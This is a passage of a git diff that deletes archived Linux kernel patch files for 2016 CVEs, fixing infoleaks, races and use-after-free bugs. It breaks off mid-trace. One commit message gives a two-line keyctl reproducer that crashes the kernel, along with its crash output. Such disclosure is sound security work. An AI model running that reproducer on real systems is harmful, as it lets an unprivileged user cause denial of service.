-Content-Transfer-Encoding: 8bit
-
-usbnet_link_change will call schedule_work and should be
-avoided if bind is failing. Otherwise we will end up with
-scheduled work referring to a netdev which has gone away.
-
-Instead of making the call conditional, we can just defer
-it to usbnet_probe, using the driver_info flag made for
-this purpose.
-
-Fixes: 8a34b0ae8778 ("usbnet: cdc_ncm: apply usbnet_link_change")
-Reported-by: Andrey Konovalov
-Suggested-by: Linus Torvalds
-Signed-off-by: Bjørn Mork
-Signed-off-by: David S. Miller
----
- drivers/net/usb/cdc_ncm.c | 20 +++++---------------
- 1 file changed, 5 insertions(+), 15 deletions(-)
-
-diff --git a/drivers/net/usb/cdc_ncm.c b/drivers/net/usb/cdc_ncm.c
-index be92796..86ba30b 100644
---- a/drivers/net/usb/cdc_ncm.c
-+++ b/drivers/net/usb/cdc_ncm.c
-@@ -988,8 +988,6 @@ EXPORT_SYMBOL_GPL(cdc_ncm_select_altsetting);
-
- static int cdc_ncm_bind(struct usbnet *dev, struct usb_interface *intf)
- {
-- int ret;
--
- /* MBIM backwards compatible function? */
- if (cdc_ncm_select_altsetting(intf) != CDC_NCM_COMM_ALTSETTING_NCM)
- return -ENODEV;
-@@ -998,16 +996,7 @@ static int cdc_ncm_bind(struct usbnet *dev, struct usb_interface *intf)
- * Additionally, generic NCM devices are assumed to accept arbitrarily
- * placed NDP.
- */
-- ret = cdc_ncm_bind_common(dev, intf, CDC_NCM_DATA_ALTSETTING_NCM, 0);
--
-- /*
-- * We should get an event when network connection is "connected" or
-- * "disconnected". Set network connection in "disconnected" state
-- * (carrier is OFF) during attach, so the IP network stack does not
-- * start IPv6 negotiation and more.
-- */
-- usbnet_link_change(dev, 0, 0);
-- return ret;
-+ return cdc_ncm_bind_common(dev, intf, CDC_NCM_DATA_ALTSETTING_NCM, 0);
- }
-
- static void cdc_ncm_align_tail(struct sk_buff *skb, size_t modulus, size_t remainder, size_t max)
-@@ -1590,7 +1579,8 @@ static void cdc_ncm_status(struct usbnet *dev, struct urb *urb)
-
- static const struct driver_info cdc_ncm_info = {
- .description = "CDC NCM",
-- .flags = FLAG_POINTTOPOINT | FLAG_NO_SETINT | FLAG_MULTI_PACKET,
-+ .flags = FLAG_POINTTOPOINT | FLAG_NO_SETINT | FLAG_MULTI_PACKET
-+ | FLAG_LINK_INTR,
- .bind = cdc_ncm_bind,
- .unbind = cdc_ncm_unbind,
- .manage_power = usbnet_manage_power,
-@@ -1603,7 +1593,7 @@ static const struct driver_info cdc_ncm_info = {
- static const struct driver_info wwan_info = {
- .description = "Mobile Broadband Network Device",
- .flags = FLAG_POINTTOPOINT | FLAG_NO_SETINT | FLAG_MULTI_PACKET
-- | FLAG_WWAN,
-+ | FLAG_LINK_INTR | FLAG_WWAN,
- .bind = cdc_ncm_bind,
- .unbind = cdc_ncm_unbind,
- .manage_power = usbnet_manage_power,
-@@ -1616,7 +1606,7 @@ static const struct driver_info wwan_info = {
- static const struct driver_info wwan_noarp_info = {
- .description = "Mobile Broadband Network Device (NO ARP)",
- .flags = FLAG_POINTTOPOINT | FLAG_NO_SETINT | FLAG_MULTI_PACKET
-- | FLAG_WWAN | FLAG_NOARP,
-+ | FLAG_LINK_INTR | FLAG_WWAN | FLAG_NOARP,
- .bind = cdc_ncm_bind,
- .unbind = cdc_ncm_unbind,
- .manage_power = usbnet_manage_power,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3951/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-3951/ANY/0002.patch
deleted file mode 100644
index 8e04b70b..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3951/ANY/0002.patch
+++ /dev/null
@@ -1,39 +0,0 @@
-From 1666984c8625b3db19a9abc298931d35ab7bc64b Mon Sep 17 00:00:00 2001
-From: Oliver Neukum
-Date: Mon, 7 Mar 2016 11:31:10 +0100
-Subject: usbnet: cleanup after bind() in probe()
-
-In case bind() works, but a later error forces bailing
-in probe() in error cases work and a timer may be scheduled.
-They must be killed. This fixes an error case related to
-the double free reported in
-http://www.spinics.net/lists/netdev/msg367669.html
-and needs to go on top of Linus' fix to cdc-ncm.
-
-Signed-off-by: Oliver Neukum
-Signed-off-by: David S. Miller
----
- drivers/net/usb/usbnet.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/net/usb/usbnet.c b/drivers/net/usb/usbnet.c
-index 0b0ba7e..1079812 100644
---- a/drivers/net/usb/usbnet.c
-+++ b/drivers/net/usb/usbnet.c
-@@ -1769,6 +1769,13 @@ out3:
- if (info->unbind)
- info->unbind (dev, udev);
- out1:
-+ /* subdrivers must undo all they did in bind() if they
-+ * fail it, but we may fail later and a deferred kevent
-+ * may trigger an error resubmitting itself and, worse,
-+ * schedule a timer. So we kill it all just in case.
-+ */
-+ cancel_work_sync(&dev->kevent);
-+ del_timer_sync(&dev->delay);
- free_netdev(net);
- out:
- return status;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-4470/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-4470/ANY/0001.patch
deleted file mode 100644
index 0b6bc265..00000000
--- a/Patches/Linux_CVEs/CVE-2016-4470/ANY/0001.patch
+++ /dev/null
@@ -1,91 +0,0 @@
-From 38327424b40bcebe2de92d07312c89360ac9229a Mon Sep 17 00:00:00 2001
-From: Dan Carpenter
-Date: Thu, 16 Jun 2016 15:48:57 +0100
-Subject: KEYS: potential uninitialized variable
-
-If __key_link_begin() failed then "edit" would be uninitialized. I've
-added a check to fix that.
-
-This allows a random user to crash the kernel, though it's quite
-difficult to achieve. There are three ways it can be done as the user
-would have to cause an error to occur in __key_link():
-
- (1) Cause the kernel to run out of memory. In practice, this is difficult
- to achieve without ENOMEM cropping up elsewhere and aborting the
- attempt.
-
- (2) Revoke the destination keyring between the keyring ID being looked up
- and it being tested for revocation. In practice, this is difficult to
- time correctly because the KEYCTL_REJECT function can only be used
- from the request-key upcall process. Further, users can only make use
- of what's in /sbin/request-key.conf, though this does including a
- rejection debugging test - which means that the destination keyring
- has to be the caller's session keyring in practice.
-
- (3) Have just enough key quota available to create a key, a new session
- keyring for the upcall and a link in the session keyring, but not then
- sufficient quota to create a link in the nominated destination keyring
- so that it fails with EDQUOT.
-
-The bug can be triggered using option (3) above using something like the
-following:
-
- echo 80 >/proc/sys/kernel/keys/root_maxbytes
- keyctl request2 user debug:fred negate @t
-
-The above sets the quota to something much lower (80) to make the bug
-easier to trigger, but this is dependent on the system. Note also that
-the name of the keyring created contains a random number that may be
-between 1 and 10 characters in size, so may throw the test off by
-changing the amount of quota used.
-
-Assuming the failure occurs, something like the following will be seen:
-
- kfree_debugcheck: out of range ptr 6b6b6b6b6b6b6b68h
- ------------[ cut here ]------------
- kernel BUG at ../mm/slab.c:2821!
- ...
- RIP: 0010:[] kfree_debugcheck+0x20/0x25
- RSP: 0018:ffff8804014a7de8 EFLAGS: 00010092
- RAX: 0000000000000034 RBX: 6b6b6b6b6b6b6b68 RCX: 0000000000000000
- RDX: 0000000000040001 RSI: 00000000000000f6 RDI: 0000000000000300
- RBP: ffff8804014a7df0 R08: 0000000000000001 R09: 0000000000000000
- R10: ffff8804014a7e68 R11: 0000000000000054 R12: 0000000000000202
- R13: ffffffff81318a66 R14: 0000000000000000 R15: 0000000000000001
- ...
- Call Trace:
- kfree+0xde/0x1bc
- assoc_array_cancel_edit+0x1f/0x36
- __key_link_end+0x55/0x63
- key_reject_and_link+0x124/0x155
- keyctl_reject_key+0xb6/0xe0
- keyctl_negate_key+0x10/0x12
- SyS_keyctl+0x9f/0xe7
- do_syscall_64+0x63/0x13a
- entry_SYSCALL64_slow_path+0x25/0x25
-
-Fixes: f70e2e06196a ('KEYS: Do preallocation for __key_link()')
-Signed-off-by: Dan Carpenter
-Signed-off-by: David Howells
-cc: stable@vger.kernel.org
-Signed-off-by: Linus Torvalds
----
- security/keys/key.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/security/keys/key.c b/security/keys/key.c
-index bd5a272..346fbf2 100644
---- a/security/keys/key.c
-+++ b/security/keys/key.c
-@@ -597,7 +597,7 @@ int key_reject_and_link(struct key *key,
-
- mutex_unlock(&key_construction_mutex);
-
-- if (keyring)
-+ if (keyring && link_ret == 0)
- __key_link_end(keyring, &key->index_key, edit);
-
- /* wake up anyone waiting for a key to be constructed */
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-4482/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-4482/ANY/0001.patch
deleted file mode 100644
index c22dfd4b..00000000
--- a/Patches/Linux_CVEs/CVE-2016-4482/ANY/0001.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From 681fef8380eb818c0b845fca5d2ab1dcbab114ee Mon Sep 17 00:00:00 2001
-From: Kangjie Lu
-Date: Tue, 3 May 2016 16:32:16 -0400
-Subject: USB: usbfs: fix potential infoleak in devio
-MIME-Version: 1.0
-Content-Type: text/plain; charset=UTF-8
-Content-Transfer-Encoding: 8bit
-
-The stack object “ci” has a total size of 8 bytes. Its last 3 bytes
-are padding bytes which are not initialized and leaked to userland
-via “copy_to_user”.
-
-Signed-off-by: Kangjie Lu
-Signed-off-by: Greg Kroah-Hartman
----
- drivers/usb/core/devio.c | 9 +++++----
- 1 file changed, 5 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/usb/core/devio.c b/drivers/usb/core/devio.c
-index 73ce871..e9f5043 100644
---- a/drivers/usb/core/devio.c
-+++ b/drivers/usb/core/devio.c
-@@ -1316,10 +1316,11 @@ static int proc_getdriver(struct usb_dev_state *ps, void __user *arg)
-
- static int proc_connectinfo(struct usb_dev_state *ps, void __user *arg)
- {
-- struct usbdevfs_connectinfo ci = {
-- .devnum = ps->dev->devnum,
-- .slow = ps->dev->speed == USB_SPEED_LOW
-- };
-+ struct usbdevfs_connectinfo ci;
-+
-+ memset(&ci, 0, sizeof(ci));
-+ ci.devnum = ps->dev->devnum;
-+ ci.slow = ps->dev->speed == USB_SPEED_LOW;
-
- if (copy_to_user(arg, &ci, sizeof(ci)))
- return -EFAULT;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-4486/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-4486/ANY/0001.patch
deleted file mode 100644
index cd795789..00000000
--- a/Patches/Linux_CVEs/CVE-2016-4486/ANY/0001.patch
+++ /dev/null
@@ -1,50 +0,0 @@
-From 5f8e44741f9f216e33736ea4ec65ca9ac03036e6 Mon Sep 17 00:00:00 2001
-From: Kangjie Lu
-Date: Tue, 3 May 2016 16:46:24 -0400
-Subject: net: fix infoleak in rtnetlink
-MIME-Version: 1.0
-Content-Type: text/plain; charset=UTF-8
-Content-Transfer-Encoding: 8bit
-
-The stack object “map” has a total size of 32 bytes. Its last 4
-bytes are padding generated by compiler. These padding bytes are
-not initialized and sent out via “nla_put”.
-
-Signed-off-by: Kangjie Lu
-Signed-off-by: David S. Miller
----
- net/core/rtnetlink.c | 18 ++++++++++--------
- 1 file changed, 10 insertions(+), 8 deletions(-)
-
-diff --git a/net/core/rtnetlink.c b/net/core/rtnetlink.c
-index a75f7e9..65763c2 100644
---- a/net/core/rtnetlink.c
-+++ b/net/core/rtnetlink.c
-@@ -1180,14 +1180,16 @@ static noinline_for_stack int rtnl_fill_vfinfo(struct sk_buff *skb,
-
- static int rtnl_fill_link_ifmap(struct sk_buff *skb, struct net_device *dev)
- {
-- struct rtnl_link_ifmap map = {
-- .mem_start = dev->mem_start,
-- .mem_end = dev->mem_end,
-- .base_addr = dev->base_addr,
-- .irq = dev->irq,
-- .dma = dev->dma,
-- .port = dev->if_port,
-- };
-+ struct rtnl_link_ifmap map;
-+
-+ memset(&map, 0, sizeof(map));
-+ map.mem_start = dev->mem_start;
-+ map.mem_end = dev->mem_end;
-+ map.base_addr = dev->base_addr;
-+ map.irq = dev->irq;
-+ map.dma = dev->dma;
-+ map.port = dev->if_port;
-+
- if (nla_put(skb, IFLA_MAP, sizeof(map), &map))
- return -EMSGSIZE;
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-4569/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-4569/ANY/0001.patch
deleted file mode 100644
index 853cd474..00000000
--- a/Patches/Linux_CVEs/CVE-2016-4569/ANY/0001.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From cec8f96e49d9be372fdb0c3836dcf31ec71e457e Mon Sep 17 00:00:00 2001
-From: Kangjie Lu
-Date: Tue, 3 May 2016 16:44:07 -0400
-Subject: ALSA: timer: Fix leak in SNDRV_TIMER_IOCTL_PARAMS
-MIME-Version: 1.0
-Content-Type: text/plain; charset=UTF-8
-Content-Transfer-Encoding: 8bit
-
-The stack object “tread” has a total size of 32 bytes. Its field
-“event” and “val” both contain 4 bytes padding. These 8 bytes
-padding bytes are sent to user without being initialized.
-
-Signed-off-by: Kangjie Lu
-Signed-off-by: Takashi Iwai
----
- sound/core/timer.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/sound/core/timer.c b/sound/core/timer.c
-index 0cfc028..306a93d 100644
---- a/sound/core/timer.c
-+++ b/sound/core/timer.c
-@@ -1737,6 +1737,7 @@ static int snd_timer_user_params(struct file *file,
- if (tu->timeri->flags & SNDRV_TIMER_IFLG_EARLY_EVENT) {
- if (tu->tread) {
- struct snd_timer_tread tread;
-+ memset(&tread, 0, sizeof(tread));
- tread.event = SNDRV_TIMER_EVENT_EARLY;
- tread.tstamp.tv_sec = 0;
- tread.tstamp.tv_nsec = 0;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-4578/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-4578/ANY/0001.patch
deleted file mode 100644
index 89b9c4ec..00000000
--- a/Patches/Linux_CVEs/CVE-2016-4578/ANY/0001.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From e4ec8cc8039a7063e24204299b462bd1383184a5 Mon Sep 17 00:00:00 2001
-From: Kangjie Lu
-Date: Tue, 3 May 2016 16:44:32 -0400
-Subject: ALSA: timer: Fix leak in events via snd_timer_user_tinterrupt
-MIME-Version: 1.0
-Content-Type: text/plain; charset=UTF-8
-Content-Transfer-Encoding: 8bit
-
-The stack object “r1” has a total size of 32 bytes. Its field
-“event” and “val” both contain 4 bytes padding. These 8 bytes
-padding bytes are sent to user without being initialized.
-
-Signed-off-by: Kangjie Lu
-Signed-off-by: Takashi Iwai
----
- sound/core/timer.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/sound/core/timer.c b/sound/core/timer.c
-index cc3c08d..e722022 100644
---- a/sound/core/timer.c
-+++ b/sound/core/timer.c
-@@ -1266,6 +1266,7 @@ static void snd_timer_user_tinterrupt(struct snd_timer_instance *timeri,
- }
- if ((tu->filter & (1 << SNDRV_TIMER_EVENT_RESOLUTION)) &&
- tu->last_resolution != resolution) {
-+ memset(&r1, 0, sizeof(r1));
- r1.event = SNDRV_TIMER_EVENT_RESOLUTION;
- r1.tstamp = tstamp;
- r1.val = resolution;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-4578/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-4578/ANY/0002.patch
deleted file mode 100644
index ca174f91..00000000
--- a/Patches/Linux_CVEs/CVE-2016-4578/ANY/0002.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From 9a47e9cff994f37f7f0dbd9ae23740d0f64f9fe6 Mon Sep 17 00:00:00 2001
-From: Kangjie Lu
-Date: Tue, 3 May 2016 16:44:20 -0400
-Subject: ALSA: timer: Fix leak in events via snd_timer_user_ccallback
-MIME-Version: 1.0
-Content-Type: text/plain; charset=UTF-8
-Content-Transfer-Encoding: 8bit
-
-The stack object “r1” has a total size of 32 bytes. Its field
-“event” and “val” both contain 4 bytes padding. These 8 bytes
-padding bytes are sent to user without being initialized.
-
-Signed-off-by: Kangjie Lu
-Signed-off-by: Takashi Iwai
----
- sound/core/timer.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/sound/core/timer.c b/sound/core/timer.c
-index 306a93d..cc3c08d 100644
---- a/sound/core/timer.c
-+++ b/sound/core/timer.c
-@@ -1223,6 +1223,7 @@ static void snd_timer_user_ccallback(struct snd_timer_instance *timeri,
- tu->tstamp = *tstamp;
- if ((tu->filter & (1 << event)) == 0 || !tu->tread)
- return;
-+ memset(&r1, 0, sizeof(r1));
- r1.event = event;
- r1.tstamp = *tstamp;
- r1.val = resolution;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-4794/3.18+/0001.patch b/Patches/Linux_CVEs/CVE-2016-4794/3.18+/0001.patch
deleted file mode 100644
index 92a1bcb5..00000000
--- a/Patches/Linux_CVEs/CVE-2016-4794/3.18+/0001.patch
+++ /dev/null
@@ -1,107 +0,0 @@
-From 6710e594f71ccaad8101bc64321152af7cd9ea28 Mon Sep 17 00:00:00 2001
-From: Tejun Heo
-Date: Wed, 25 May 2016 11:48:25 -0400
-Subject: percpu: fix synchronization between synchronous map extension and
- chunk destruction
-
-For non-atomic allocations, pcpu_alloc() can try to extend the area
-map synchronously after dropping pcpu_lock; however, the extension
-wasn't synchronized against chunk destruction and the chunk might get
-freed while extension is in progress.
-
-This patch fixes the bug by putting most of non-atomic allocations
-under pcpu_alloc_mutex to synchronize against pcpu_balance_work which
-is responsible for async chunk management including destruction.
-
-Signed-off-by: Tejun Heo
-Reported-and-tested-by: Alexei Starovoitov
-Reported-by: Vlastimil Babka
-Reported-by: Sasha Levin
-Cc: stable@vger.kernel.org # v3.18+
-Fixes: 1a4d76076cda ("percpu: implement asynchronous chunk population")
----
- mm/percpu.c | 16 ++++++++--------
- 1 file changed, 8 insertions(+), 8 deletions(-)
-
-diff --git a/mm/percpu.c b/mm/percpu.c
-index b1d2a38..9903830 100644
---- a/mm/percpu.c
-+++ b/mm/percpu.c
-@@ -162,7 +162,7 @@ static struct pcpu_chunk *pcpu_reserved_chunk;
- static int pcpu_reserved_chunk_limit;
-
- static DEFINE_SPINLOCK(pcpu_lock); /* all internal data structures */
--static DEFINE_MUTEX(pcpu_alloc_mutex); /* chunk create/destroy, [de]pop */
-+static DEFINE_MUTEX(pcpu_alloc_mutex); /* chunk create/destroy, [de]pop, map ext */
-
- static struct list_head *pcpu_slot __read_mostly; /* chunk list slots */
-
-@@ -444,6 +444,8 @@ static int pcpu_extend_area_map(struct pcpu_chunk *chunk, int new_alloc)
- size_t old_size = 0, new_size = new_alloc * sizeof(new[0]);
- unsigned long flags;
-
-+ lockdep_assert_held(&pcpu_alloc_mutex);
-+
- new = pcpu_mem_zalloc(new_size);
- if (!new)
- return -ENOMEM;
-@@ -890,6 +892,9 @@ static void __percpu *pcpu_alloc(size_t size, size_t align, bool reserved,
- return NULL;
- }
-
-+ if (!is_atomic)
-+ mutex_lock(&pcpu_alloc_mutex);
-+
- spin_lock_irqsave(&pcpu_lock, flags);
-
- /* serve reserved allocations from the reserved chunk if available */
-@@ -962,12 +967,9 @@ restart:
- if (is_atomic)
- goto fail;
-
-- mutex_lock(&pcpu_alloc_mutex);
--
- if (list_empty(&pcpu_slot[pcpu_nr_slots - 1])) {
- chunk = pcpu_create_chunk();
- if (!chunk) {
-- mutex_unlock(&pcpu_alloc_mutex);
- err = "failed to allocate new chunk";
- goto fail;
- }
-@@ -978,7 +980,6 @@ restart:
- spin_lock_irqsave(&pcpu_lock, flags);
- }
-
-- mutex_unlock(&pcpu_alloc_mutex);
- goto restart;
-
- area_found:
-@@ -988,8 +989,6 @@ area_found:
- if (!is_atomic) {
- int page_start, page_end, rs, re;
-
-- mutex_lock(&pcpu_alloc_mutex);
--
- page_start = PFN_DOWN(off);
- page_end = PFN_UP(off + size);
-
-@@ -1000,7 +999,6 @@ area_found:
-
- spin_lock_irqsave(&pcpu_lock, flags);
- if (ret) {
-- mutex_unlock(&pcpu_alloc_mutex);
- pcpu_free_area(chunk, off, &occ_pages);
- err = "failed to populate";
- goto fail_unlock;
-@@ -1040,6 +1038,8 @@ fail:
- /* see the flag handling in pcpu_blance_workfn() */
- pcpu_atomic_alloc_failed = true;
- pcpu_schedule_balance_work();
-+ } else {
-+ mutex_unlock(&pcpu_alloc_mutex);
- }
- return NULL;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-4794/3.18+/0002.patch b/Patches/Linux_CVEs/CVE-2016-4794/3.18+/0002.patch
deleted file mode 100644
index 6ab2f0a9..00000000
--- a/Patches/Linux_CVEs/CVE-2016-4794/3.18+/0002.patch
+++ /dev/null
@@ -1,156 +0,0 @@
-From 4f996e234dad488e5d9ba0858bc1bae12eff82c3 Mon Sep 17 00:00:00 2001
-From: Tejun Heo
-Date: Wed, 25 May 2016 11:48:25 -0400
-Subject: percpu: fix synchronization between chunk->map_extend_work and chunk
- destruction
-
-Atomic allocations can trigger async map extensions which is serviced
-by chunk->map_extend_work. pcpu_balance_work which is responsible for
-destroying idle chunks wasn't synchronizing properly against
-chunk->map_extend_work and may end up freeing the chunk while the work
-item is still in flight.
-
-This patch fixes the bug by rolling async map extension operations
-into pcpu_balance_work.
-
-Signed-off-by: Tejun Heo
-Reported-and-tested-by: Alexei Starovoitov
-Reported-by: Vlastimil Babka
-Reported-by: Sasha Levin
-Cc: stable@vger.kernel.org # v3.18+
-Fixes: 9c824b6a172c ("percpu: make sure chunk->map array has available space")
----
- mm/percpu.c | 57 ++++++++++++++++++++++++++++++++++++---------------------
- 1 file changed, 36 insertions(+), 21 deletions(-)
-
-diff --git a/mm/percpu.c b/mm/percpu.c
-index 0c59684..b1d2a38 100644
---- a/mm/percpu.c
-+++ b/mm/percpu.c
-@@ -112,7 +112,7 @@ struct pcpu_chunk {
- int map_used; /* # of map entries used before the sentry */
- int map_alloc; /* # of map entries allocated */
- int *map; /* allocation map */
-- struct work_struct map_extend_work;/* async ->map[] extension */
-+ struct list_head map_extend_list;/* on pcpu_map_extend_chunks */
-
- void *data; /* chunk data */
- int first_free; /* no free below this */
-@@ -166,6 +166,9 @@ static DEFINE_MUTEX(pcpu_alloc_mutex); /* chunk create/destroy, [de]pop */
-
- static struct list_head *pcpu_slot __read_mostly; /* chunk list slots */
-
-+/* chunks which need their map areas extended, protected by pcpu_lock */
-+static LIST_HEAD(pcpu_map_extend_chunks);
-+
- /*
- * The number of empty populated pages, protected by pcpu_lock. The
- * reserved chunk doesn't contribute to the count.
-@@ -395,13 +398,19 @@ static int pcpu_need_to_extend(struct pcpu_chunk *chunk, bool is_atomic)
- {
- int margin, new_alloc;
-
-+ lockdep_assert_held(&pcpu_lock);
-+
- if (is_atomic) {
- margin = 3;
-
- if (chunk->map_alloc <
-- chunk->map_used + PCPU_ATOMIC_MAP_MARGIN_LOW &&
-- pcpu_async_enabled)
-- schedule_work(&chunk->map_extend_work);
-+ chunk->map_used + PCPU_ATOMIC_MAP_MARGIN_LOW) {
-+ if (list_empty(&chunk->map_extend_list)) {
-+ list_add_tail(&chunk->map_extend_list,
-+ &pcpu_map_extend_chunks);
-+ pcpu_schedule_balance_work();
-+ }
-+ }
- } else {
- margin = PCPU_ATOMIC_MAP_MARGIN_HIGH;
- }
-@@ -467,20 +476,6 @@ out_unlock:
- return 0;
- }
-
--static void pcpu_map_extend_workfn(struct work_struct *work)
--{
-- struct pcpu_chunk *chunk = container_of(work, struct pcpu_chunk,
-- map_extend_work);
-- int new_alloc;
--
-- spin_lock_irq(&pcpu_lock);
-- new_alloc = pcpu_need_to_extend(chunk, false);
-- spin_unlock_irq(&pcpu_lock);
--
-- if (new_alloc)
-- pcpu_extend_area_map(chunk, new_alloc);
--}
--
- /**
- * pcpu_fit_in_area - try to fit the requested allocation in a candidate area
- * @chunk: chunk the candidate area belongs to
-@@ -740,7 +735,7 @@ static struct pcpu_chunk *pcpu_alloc_chunk(void)
- chunk->map_used = 1;
-
- INIT_LIST_HEAD(&chunk->list);
-- INIT_WORK(&chunk->map_extend_work, pcpu_map_extend_workfn);
-+ INIT_LIST_HEAD(&chunk->map_extend_list);
- chunk->free_size = pcpu_unit_size;
- chunk->contig_hint = pcpu_unit_size;
-
-@@ -1129,6 +1124,7 @@ static void pcpu_balance_workfn(struct work_struct *work)
- if (chunk == list_first_entry(free_head, struct pcpu_chunk, list))
- continue;
-
-+ list_del_init(&chunk->map_extend_list);
- list_move(&chunk->list, &to_free);
- }
-
-@@ -1146,6 +1142,25 @@ static void pcpu_balance_workfn(struct work_struct *work)
- pcpu_destroy_chunk(chunk);
- }
-
-+ /* service chunks which requested async area map extension */
-+ do {
-+ int new_alloc = 0;
-+
-+ spin_lock_irq(&pcpu_lock);
-+
-+ chunk = list_first_entry_or_null(&pcpu_map_extend_chunks,
-+ struct pcpu_chunk, map_extend_list);
-+ if (chunk) {
-+ list_del_init(&chunk->map_extend_list);
-+ new_alloc = pcpu_need_to_extend(chunk, false);
-+ }
-+
-+ spin_unlock_irq(&pcpu_lock);
-+
-+ if (new_alloc)
-+ pcpu_extend_area_map(chunk, new_alloc);
-+ } while (chunk);
-+
- /*
- * Ensure there are certain number of free populated pages for
- * atomic allocs. Fill up from the most packed so that atomic
-@@ -1644,7 +1659,7 @@ int __init pcpu_setup_first_chunk(const struct pcpu_alloc_info *ai,
- */
- schunk = memblock_virt_alloc(pcpu_chunk_struct_size, 0);
- INIT_LIST_HEAD(&schunk->list);
-- INIT_WORK(&schunk->map_extend_work, pcpu_map_extend_workfn);
-+ INIT_LIST_HEAD(&schunk->map_extend_list);
- schunk->base_addr = base_addr;
- schunk->map = smap;
- schunk->map_alloc = ARRAY_SIZE(smap);
-@@ -1673,7 +1688,7 @@ int __init pcpu_setup_first_chunk(const struct pcpu_alloc_info *ai,
- if (dyn_size) {
- dchunk = memblock_virt_alloc(pcpu_chunk_struct_size, 0);
- INIT_LIST_HEAD(&dchunk->list);
-- INIT_WORK(&dchunk->map_extend_work, pcpu_map_extend_workfn);
-+ INIT_LIST_HEAD(&dchunk->map_extend_list);
- dchunk->base_addr = base_addr;
- dchunk->map = dmap;
- dchunk->map_alloc = ARRAY_SIZE(dmap);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-4805/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-4805/ANY/0001.patch
deleted file mode 100644
index 21930a35..00000000
--- a/Patches/Linux_CVEs/CVE-2016-4805/ANY/0001.patch
+++ /dev/null
@@ -1,149 +0,0 @@
-From 1f461dcdd296eecedaffffc6bae2bfa90bd7eb89 Mon Sep 17 00:00:00 2001
-From: Guillaume Nault
-Date: Wed, 23 Mar 2016 16:38:55 +0100
-Subject: ppp: take reference on channels netns
-
-Let channels hold a reference on their network namespace.
-Some channel types, like ppp_async and ppp_synctty, can have their
-userspace controller running in a different namespace. Therefore they
-can't rely on them to preclude their netns from being removed from
-under them.
-
-==================================================================
-BUG: KASAN: use-after-free in ppp_unregister_channel+0x372/0x3a0 at
-addr ffff880064e217e0
-Read of size 8 by task syz-executor/11581
-=============================================================================
-BUG net_namespace (Not tainted): kasan: bad access detected
------------------------------------------------------------------------------
-
-Disabling lock debugging due to kernel taint
-INFO: Allocated in copy_net_ns+0x6b/0x1a0 age=92569 cpu=3 pid=6906
-[< none >] ___slab_alloc+0x4c7/0x500 kernel/mm/slub.c:2440
-[< none >] __slab_alloc+0x4c/0x90 kernel/mm/slub.c:2469
-[< inline >] slab_alloc_node kernel/mm/slub.c:2532
-[< inline >] slab_alloc kernel/mm/slub.c:2574
-[< none >] kmem_cache_alloc+0x23a/0x2b0 kernel/mm/slub.c:2579
-[< inline >] kmem_cache_zalloc kernel/include/linux/slab.h:597
-[< inline >] net_alloc kernel/net/core/net_namespace.c:325
-[< none >] copy_net_ns+0x6b/0x1a0 kernel/net/core/net_namespace.c:360
-[< none >] create_new_namespaces+0x2f6/0x610 kernel/kernel/nsproxy.c:95
-[< none >] copy_namespaces+0x297/0x320 kernel/kernel/nsproxy.c:150
-[< none >] copy_process.part.35+0x1bf4/0x5760 kernel/kernel/fork.c:1451
-[< inline >] copy_process kernel/kernel/fork.c:1274
-[< none >] _do_fork+0x1bc/0xcb0 kernel/kernel/fork.c:1723
-[< inline >] SYSC_clone kernel/kernel/fork.c:1832
-[< none >] SyS_clone+0x37/0x50 kernel/kernel/fork.c:1826
-[< none >] entry_SYSCALL_64_fastpath+0x16/0x7a kernel/arch/x86/entry/entry_64.S:185
-
-INFO: Freed in net_drop_ns+0x67/0x80 age=575 cpu=2 pid=2631
-[< none >] __slab_free+0x1fc/0x320 kernel/mm/slub.c:2650
-[< inline >] slab_free kernel/mm/slub.c:2805
-[< none >] kmem_cache_free+0x2a0/0x330 kernel/mm/slub.c:2814
-[< inline >] net_free kernel/net/core/net_namespace.c:341
-[< none >] net_drop_ns+0x67/0x80 kernel/net/core/net_namespace.c:348
-[< none >] cleanup_net+0x4e5/0x600 kernel/net/core/net_namespace.c:448
-[< none >] process_one_work+0x794/0x1440 kernel/kernel/workqueue.c:2036
-[< none >] worker_thread+0xdb/0xfc0 kernel/kernel/workqueue.c:2170
-[< none >] kthread+0x23f/0x2d0 kernel/drivers/block/aoe/aoecmd.c:1303
-[< none >] ret_from_fork+0x3f/0x70 kernel/arch/x86/entry/entry_64.S:468
-INFO: Slab 0xffffea0001938800 objects=3 used=0 fp=0xffff880064e20000
-flags=0x5fffc0000004080
-INFO: Object 0xffff880064e20000 @offset=0 fp=0xffff880064e24200
-
-CPU: 1 PID: 11581 Comm: syz-executor Tainted: G B 4.4.0+
-Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
-rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
